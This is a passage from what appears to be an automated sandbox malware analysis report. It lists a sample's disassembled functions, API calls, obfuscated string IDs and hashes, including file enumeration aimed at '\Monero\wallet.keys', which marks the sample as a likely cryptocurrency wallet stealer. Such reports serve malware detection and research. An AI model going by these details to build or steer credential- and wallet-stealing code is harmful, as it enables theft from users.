                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
                      • Instruction ID: 07f3c02ee3c202f723d2e26ee8da434637e3f1ba61d816f88894e493866ed38c
                      • Opcode Fuzzy Hash: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
                      • Instruction Fuzzy Hash: 7041317194011DABDB24DB94DCA9BEDBB74FF48701F2042DAE40962191DB342F89CF61
                      Function 00910DF4 Relevance: 10.4, Strings: 7, Instructions: 1656COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: j\j$j\j$)K~S$/7$@vc]$Yo{$ov[o
                      • API String ID: 0-93978172
                      • Opcode ID: 8c65bcff9456bc62811789093acb95268b2dad0adad0657f9165737bb68b5393
                      • Instruction ID: 077c87c095dcae4748cccfb74ae9551360f3cb67dad80053842555b54920c891
                      • Opcode Fuzzy Hash: 8c65bcff9456bc62811789093acb95268b2dad0adad0657f9165737bb68b5393
                      • Instruction Fuzzy Hash: 0FB238F3A0C2149FE3046E2DEC8567ABBE9EF94720F1A493DEAC5C3740E63558048697
                      Function 0090F314 Relevance: 10.3, Strings: 7, Instructions: 1562COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: &[s$6O4$7?+o$YX{\$gEf$o4=$*y
                      • API String ID: 0-559821975
                      • Opcode ID: b6cbd13e8717eda8ddb88ba63e543dd48f9eeb8f88310d72f0f0b0b31558e117
                      • Instruction ID: a5985571db38a96dc013ba22c402339a98026bd23ec644c4c21937860d0287c6
                      • Opcode Fuzzy Hash: b6cbd13e8717eda8ddb88ba63e543dd48f9eeb8f88310d72f0f0b0b31558e117
                      • Instruction Fuzzy Hash: 5EB218F3A08210AFE304AE2DEC8567AB7E9EF94720F1A493DE6C4C7744E63558448797
                      Function 0054E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00560D73), ref: 0054E4A2
                      • StrCmpCA.SHLWAPI(?,005614F8), ref: 0054E4F2
                      • StrCmpCA.SHLWAPI(?,005614FC), ref: 0054E508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054EBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: fcf4b5c02a7609ec2ad5cc0596d238651198824d12de54c6e0fcba03286503ee
                      • Instruction ID: 92de1f8ba9523055a40bdc1c4033d087b780ebf467ebe43ece16487fd614e6fc
                      • Opcode Fuzzy Hash: fcf4b5c02a7609ec2ad5cc0596d238651198824d12de54c6e0fcba03286503ee
                      • Instruction Fuzzy Hash: 8C1212719101199ADB14FB70DCAAEED7B38BF94301F40469AB90A56091FE346F4DCF92
                      Function 00919458 Relevance: 9.2, Strings: 6, Instructions: 1663COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 5<{]$A$j*$Q8w$go'$v&_O$vMy
                      • API String ID: 0-3981917027
                      • Opcode ID: 24ba4624728350301f04ae71f931b5b22ecf8455e3ae1da031b97ac93c63bda2
                      • Instruction ID: 6659ec2cd1edde65ff8470e9ce9820ff2a2f15ca51a2760e36d6fdc8bf2e44e1
                      • Opcode Fuzzy Hash: 24ba4624728350301f04ae71f931b5b22ecf8455e3ae1da031b97ac93c63bda2
                      • Instruction Fuzzy Hash: F6B2F7F3A082049FE304AE2DEC8577ABBE5EF94720F16893DE6C4C3744E63598058696
                      Function 009143E9 Relevance: 9.1, Strings: 6, Instructions: 1626COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: "bWM$"]$&]$q1>q$ri@$_xQ
                      • API String ID: 0-2963833353
                      • Opcode ID: fd6ebcbcca17675e7da965ffb51f57a5e5cbe4b08374b0c5352d096f43b897ed
                      • Instruction ID: d71cf2ae8c412e58be97c78cf4314dc60694f517c3c49b97b8cf397bd0ea47c3
                      • Opcode Fuzzy Hash: fd6ebcbcca17675e7da965ffb51f57a5e5cbe4b08374b0c5352d096f43b897ed
                      • Instruction Fuzzy Hash: E3B216F360C2049FE7046E2DEC8567ABBE9EFD4320F1A463DE6C5C3744EA3598058696
                      Function 0090BE41 Relevance: 9.1, Strings: 6, Instructions: 1610COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: +Wn$ET}$E}$ZW{W$j,w$y/v<
                      • API String ID: 0-3178496043
                      • Opcode ID: ff5ffd26f9466b5e41ad68b3a8988793232f931f55dc42445c42535a8f069118
                      • Instruction ID: 299a1695640aca9699049323fa29575d38ba3b423cdfeaf76eff2eed5f950f50
                      • Opcode Fuzzy Hash: ff5ffd26f9466b5e41ad68b3a8988793232f931f55dc42445c42535a8f069118
                      • Instruction Fuzzy Hash: CAB2D7F3A082049FE304AE2DDC8567AB7D9EFD4720F1A893DE6C4C7744EA3598118697
                      Function 0090D82C Relevance: 9.1, Strings: 6, Instructions: 1574COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: CF+G$D?$K0/?$]jl'$]jl'$a(}
                      • API String ID: 0-652231954
                      • Opcode ID: f4c91ee665a94ed687d8b413a89db337e9e301ff7410c14666c488b69bac032c
                      • Instruction ID: 7851049ae545a8249203e2a82ca9a484455eb468ad96c96013c382e43f3e17f6
                      • Opcode Fuzzy Hash: f4c91ee665a94ed687d8b413a89db337e9e301ff7410c14666c488b69bac032c
                      • Instruction Fuzzy Hash: 38B217F36082009FE3046E2DEC8577AFBE9EF94720F1A493DEAC487744E67598058697
                      Function 00549AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                      • LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: NT
                      • API String ID: 4291131564-3872220154
                      • Opcode ID: 292f08fdf4b4d8805c376d937098525a36b7c593564d086cca27324208f1f5a5
                      • Instruction ID: fa5fa80d131fc05bd5f03fd5fac8984afd61c662d84234e1d302f94a3c0d89c4
                      • Opcode Fuzzy Hash: 292f08fdf4b4d8805c376d937098525a36b7c593564d086cca27324208f1f5a5
                      • Instruction Fuzzy Hash: B011AFB4640208BFEB10CF64DC95FAA77B5FB89704F208059FA159B390C7B6A901DBA4
                      Function 0054C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0054C871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0054C87C
                      • lstrcat.KERNEL32(?,00560B46), ref: 0054C943
                      • lstrcat.KERNEL32(?,00560B47), ref: 0054C957
                      • lstrcat.KERNEL32(?,00560B4E), ref: 0054C978
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      • Opcode ID: 5d4839d244f78d6460426789761c02a98c4f63634a8cb4e8fec79646abd5d86a
                      • Instruction ID: 6abc8885156e23aa612f09f1e5a6c7c604471bd6bb294e277aba3faf4a2f7b74
                      • Opcode Fuzzy Hash: 5d4839d244f78d6460426789761c02a98c4f63634a8cb4e8fec79646abd5d86a
                      • Instruction Fuzzy Hash: 2641827594420EEFDB50CF90DD89BEEBBB8BB44304F1085A9E509A7280D7745A84CF95
                      Function 0091CE38 Relevance: 7.6, Strings: 5, Instructions: 1337COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !n<$LS|/$bY6$bcfn$}5#e
                      • API String ID: 0-1327736982
                      • Opcode ID: da4fda50a4fdb4937e11bdabede1e5fd13c0991cf1e17671cfa464c45b4c1402
                      • Instruction ID: 6bb08d2040c6e64a22f0579bc1201c0f4de3b12fdd78f7de153d70e0371d9db8
                      • Opcode Fuzzy Hash: da4fda50a4fdb4937e11bdabede1e5fd13c0991cf1e17671cfa464c45b4c1402
                      • Instruction Fuzzy Hash: E19228F3A082149FE3046E2DEC8577AFBE9EF94320F1A453DEAC4C7744E63598058696
                      Function 00556920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 0055696C
                      • sscanf.NTDLL ref: 00556999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005569B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005569C0
                      • ExitProcess.KERNEL32 ref: 005569DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
